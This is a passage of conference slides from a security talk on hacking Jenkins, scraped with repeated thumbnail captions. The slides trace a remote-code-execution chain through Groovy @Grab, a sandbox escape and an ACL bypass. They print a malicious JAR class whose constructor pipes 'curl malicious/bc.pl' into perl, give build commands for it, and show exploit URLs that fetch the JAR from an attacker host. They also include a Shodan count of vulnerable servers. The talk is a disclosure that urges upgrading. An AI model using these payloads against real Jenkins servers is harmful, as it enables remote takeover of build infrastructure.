While reproducing it on remote…It shows
What the hell is that
![Page 75: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/75.jpg)
Root cause analysis
• Pipeline Shared Groovy Libraries Plugin
• A plugin for importing customized libraries into Pipeline
• Jenkins loads your customized library before every Pipeline execute
• The root cause is - during compile-time, there is no
corresponded library in classPath
![Page 76: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/76.jpg)
How to fixAsk admin to uninstall the plugin
![Page 77: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/77.jpg)
How to fixAsk admin to uninstall the plugin
![Page 78: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/78.jpg)
@Grab@Grab(group='commons-lang', module='commons-lang', version='2.4')
import org.apache.commons.lang.WordUtils
println "Hello ${WordUtils.capitalize('world')}"
![Page 79: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/79.jpg)
@GrabResolve@GrabResolver(name='restlet', root='http://maven.restlet.org/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
![Page 80: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/80.jpg)
@GrabResolve@GrabResolver(name='restlet', root='http://malicious.com/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
![Page 81: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/81.jpg)
Oh, it works220.133.114.83 - - [18/Dec/2018:18:56:54 +0800] "HEAD
/org/restlet/org.restlet/1.1.6/org.restlet-1.1.6.jar
HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"
![Page 82: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/82.jpg)
Import arbitrary JARBut how to get code execution?
![Page 83: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/83.jpg)
Dig deeper into @GrabWe start to review the Groovy implementation
![Page 84: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/84.jpg)
groovy.grape.GrapeIvy
![Page 85: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/85.jpg)
groovy.grape.GrapeIvy
![Page 86: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/86.jpg)
YesWe can poke the Constructor on any class!
![Page 87: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/87.jpg)
Chain all together
![Page 88: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/88.jpg)
Prepare the malicious JARpublic class Orange {
public Orange() {
try {
String payload = "curl malicious/bc.pl | perl -";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}}
![Page 89: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/89.jpg)
Prepare the malicious JAR$ javac Orange.java
$ mkdir -p META-INF/services/
$ echo Orange >META-INF/services/org.codehaus.groovy.plugins.Runners
$ find –type f
./Orange.java
./Orange.class
./META-INF/services/org.codehaus.groovy.plugins.Runners
$ jar cvf poc-1.jar tw/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[host]/tw/orange/poc/1/poc-1.jar
![Page 90: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/90.jpg)
Attacking remote Jenkins!
http://jenkins/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://evil/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;
![Page 91: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/91.jpg)
Demohttps://youtu.be/abuH-j-6-s0
![Page 92: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/92.jpg)
Survey on Shodan
• It is about 75000 Jenkins servers in the wild• $ cat versions | sort | uniq -c | sort -n | less
• 1933 - Jenkins: 2.107.3• 1577 - Jenkins: 2.60.3• 1559 - Jenkins: 2.107.2• 1348 - Jenkins: 2.89.4• 1263 - Jenkins: 2.155• 1095 - Jenkins: 2.153• 1012 - Jenkins: 2.107.1• 958 - Jenkins: 2.89.3
11750- Jenkins: 2.150.15473 - Jenkins: 2.138.34583 - Jenkins: 2.121.34534 - Jenkins: 2.138.23389 - Jenkins: 2.1562987 - Jenkins: 2.138.12530 - Jenkins: 2.121.12422 - Jenkins: 2.121.2
![Page 93: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/93.jpg)
Survey on Shodan
• We suppose all installed the suggested plugins
• Enable Overall/Read are vulnerable
• Disable Overall/Read
• Version > 2.138 can be chained with the ACL bypass vulnerability
• It's about 45000/75000 vulnerable Jenkins we can hack
![Page 94: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/94.jpg)
Evolution of the exploit
2019-01-08CVE-2019-1003000
Sandbox escape fixed(classLoader.parseClass)
2018-12-05
CVE-2018-1000861 ACL bypass fixed
2019-01-16
Release the blog Hacking Jenkins part-1
2019-01-28CVE-2019-1003005
Another path to reach the syntax validation fixed(GroovyShell.parse)
2019-02-19
Release the blog Hacking Jenkins part-2
and the RCE chain
@orange_8361
@orange_8361
@orange_8361
@0ang3el
@orange_8361
2019-03-06CVE-2019-1003029
Another sandbox escape in GroovyShell.parse fixed
@webpentest
![Page 95: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/95.jpg)
Evolution of the exploit
• Original entry (based on classLoader.parseClass)
• Meta programming is still required to obtain code execution
• New entry found by @0ang3el (based on GroovyShell.parse)
• A more universal entry
• The new entry is based on a higher level Groovy API
• With more features added compared to the original API, @webpentest
found an easier way to escape the sandbox!
![Page 96: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/96.jpg)
More reliable exploit chainhttp://jenkins/securityRealm/user/admin/descriptorByName/
org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.Secur
eGroovyScript/checkScript
?sandbox=true
&value=public class poc {
public poc() { "curl orange.tw/bc.pl | perl -".execute() }
}
CVE-2019-1003029 by @webpentestCVE-2019-1003005 by @0ang3elCVE-2018-1000861 by @orange_8361
![Page 97: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/97.jpg)
awesome-jenkins-rce-2019
![Page 98: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/98.jpg)
![Page 99: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/99.jpg)
![Page 100: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/100.jpg)
![Page 101: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/101.jpg)
![Page 102: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/102.jpg)
Upgrade your Jenkins ASAP